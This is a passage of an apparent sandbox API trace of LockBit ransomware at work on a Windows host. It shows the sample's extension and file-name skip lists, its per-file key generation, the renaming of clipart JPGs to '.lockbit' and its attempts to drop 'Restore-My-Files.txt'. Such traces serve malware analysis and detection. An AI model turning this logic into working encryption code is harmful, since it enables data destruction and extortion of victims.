[0158.751] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0158.751] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0158.751] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0158.751] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0158.752] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0158.752] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0158.752] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0158.752] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0158.752] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0158.752] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.752] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0158.752] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0158.752] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0158.752] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0158.752] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0313970.JPG") returned 1 [0158.752] lstrcmpiW (lpString1="ntldr", lpString2="J0313970.JPG") returned 1 [0158.752] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0313970.JPG") returned 1 [0158.752] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0313970.JPG") returned -1 [0158.752] lstrcmpiW (lpString1="autorun.inf", lpString2="J0313970.JPG") returned -1 [0158.752] lstrcmpiW (lpString1="thumbs.db", lpString2="J0313970.JPG") returned 1 [0158.752] lstrcmpiW (lpString1="iconcache.db", lpString2="J0313970.JPG") returned -1 [0158.752] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.752] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313970.JPG") returned=".JPG" [0158.752] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0158.752] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0158.752] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0158.752] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0158.753] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0158.753] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0158.753] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0158.753] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0158.753] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0158.753] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0158.753] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0158.753] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0158.753] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0158.753] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0158.753] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0158.753] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0158.753] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0158.753] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0158.753] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0158.753] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0158.753] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0158.753] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0158.753] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0158.753] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0158.753] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0158.753] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0158.753] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0158.753] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0158.753] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313970.JPG.lockbit") returned 72 [0158.754] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313970.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313970.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0158.755] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.755] malloc (_Size=0x40068) returned 0x3df0008 [0158.755] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=33195) returned 1 [0158.755] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.756] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0158.756] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.757] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0158.757] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0158.763] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313970.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313970.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.763] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.763] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0158.764] free (_Block=0x1fa2ed8) [0158.764] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313970.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.764] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.764] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.764] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d07fb00, ftCreationTime.dwHighDateTime=0x1c97bb5, ftLastAccessTime.dwLowDateTime=0x5674c1b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3d07fb00, ftLastWriteTime.dwHighDateTime=0x1c97bb5, nFileSizeHigh=0x0, nFileSizeLow=0xb9d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0313974.JPG", cAlternateFileName="")) returned 1 [0158.764] lstrcmpiW (lpString1=".", lpString2="J0313974.JPG") returned -1 [0158.764] lstrcmpiW (lpString1="..", lpString2="J0313974.JPG") returned -1 [0158.764] PathFindExtensionW (pszPath="J0313974.JPG") returned=".JPG" [0158.764] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0158.764] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0158.764] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0158.764] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0158.764] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0158.764] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0158.764] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0158.764] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0158.764] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0158.764] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0158.764] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0158.764] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0158.764] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0158.764] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0158.765] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0158.765] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0158.765] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0158.765] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0158.765] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0158.765] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0158.765] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0158.765] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0158.765] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0158.765] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0158.765] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.765] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0158.765] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0158.765] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0158.765] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0158.765] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0158.765] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0158.765] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0158.765] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0158.765] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0158.765] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0158.765] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0158.765] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0158.765] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0158.765] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0158.765] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0158.765] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0158.766] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0158.766] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.766] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0158.766] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0158.766] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0158.766] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0158.766] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0313974.JPG") returned 1 [0158.766] lstrcmpiW (lpString1="ntldr", lpString2="J0313974.JPG") returned 1 [0158.766] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0313974.JPG") returned 1 [0158.766] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0313974.JPG") returned -1 [0158.766] lstrcmpiW (lpString1="autorun.inf", lpString2="J0313974.JPG") returned -1 [0158.766] lstrcmpiW (lpString1="thumbs.db", lpString2="J0313974.JPG") returned 1 [0158.766] lstrcmpiW (lpString1="iconcache.db", lpString2="J0313974.JPG") returned -1 [0158.766] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.766] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313974.JPG") returned=".JPG" [0158.766] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0158.766] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0158.766] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0158.766] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0158.766] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0158.766] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0158.766] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0158.766] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0158.766] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0158.766] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0158.766] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0158.767] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0158.767] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0158.767] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0158.767] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0158.767] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0158.767] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0158.767] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0158.767] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0158.767] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0158.767] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0158.767] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0158.767] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0158.767] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0158.767] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0158.767] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0158.767] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0158.767] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0158.767] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313974.JPG.lockbit") returned 72 [0158.767] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313974.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313974.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0158.768] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.769] malloc (_Size=0x40068) returned 0x3df0008 [0158.769] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=47569) returned 1 [0158.769] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.769] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0158.769] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.770] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0158.770] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.775] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313974.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313974.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.775] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.775] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0158.778] free (_Block=0x1fa2ed8) [0158.778] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313974.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.778] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.778] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.779] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2feb0c00, ftCreationTime.dwHighDateTime=0x1c97bb5, ftLastAccessTime.dwLowDateTime=0x5674c1b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2feb0c00, ftLastWriteTime.dwHighDateTime=0x1c97bb5, nFileSizeHigh=0x0, nFileSizeLow=0x40f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0314068.JPG", cAlternateFileName="")) returned 1 [0158.779] lstrcmpiW (lpString1=".", lpString2="J0314068.JPG") returned -1 [0158.779] lstrcmpiW (lpString1="..", lpString2="J0314068.JPG") returned -1 [0158.779] PathFindExtensionW (pszPath="J0314068.JPG") returned=".JPG" [0158.779] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0158.779] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0158.779] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0158.779] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0158.779] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0158.779] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0158.779] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0158.779] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0158.779] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0158.779] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0158.779] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0158.779] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0158.779] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0158.779] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0158.779] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0158.779] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0158.779] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0158.779] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0158.779] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0158.779] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0158.780] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0158.780] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0158.780] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0158.780] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0158.780] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.780] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0158.780] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0158.780] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0158.780] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0158.780] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0158.780] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0158.780] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0158.780] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0158.780] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0158.780] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0158.780] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0158.780] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0158.780] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0158.780] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0158.780] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0158.780] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0158.780] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0158.780] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.780] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0158.780] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0158.780] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0158.780] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0158.780] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0314068.JPG") returned 1 [0158.781] lstrcmpiW (lpString1="ntldr", lpString2="J0314068.JPG") returned 1 [0158.781] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0314068.JPG") returned 1 [0158.781] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0314068.JPG") returned -1 [0158.781] lstrcmpiW (lpString1="autorun.inf", lpString2="J0314068.JPG") returned -1 [0158.781] lstrcmpiW (lpString1="thumbs.db", lpString2="J0314068.JPG") returned 1 [0158.781] lstrcmpiW (lpString1="iconcache.db", lpString2="J0314068.JPG") returned -1 [0158.781] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.781] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0314068.JPG") returned=".JPG" [0158.781] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0158.781] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0158.781] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0158.781] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0158.781] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0158.781] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0158.781] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0158.781] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0158.781] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0158.781] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0158.781] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0158.781] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0158.781] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0158.781] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0158.781] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0158.781] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0158.781] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0158.781] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0158.782] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0158.782] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0158.782] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0158.782] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0158.782] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0158.782] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0158.782] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0158.782] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0158.782] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0158.782] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0158.782] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0314068.JPG.lockbit") returned 72 [0158.782] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0314068.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0314068.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0158.784] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.784] malloc (_Size=0x40068) returned 0x3df0008 [0158.784] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16626) returned 1 [0158.784] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.785] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0158.785] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.786] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0158.786] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.790] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0314068.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0314068.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.790] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.790] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0158.796] free (_Block=0x1fa2ed8) [0158.796] PathRemoveFileSpecW (in: 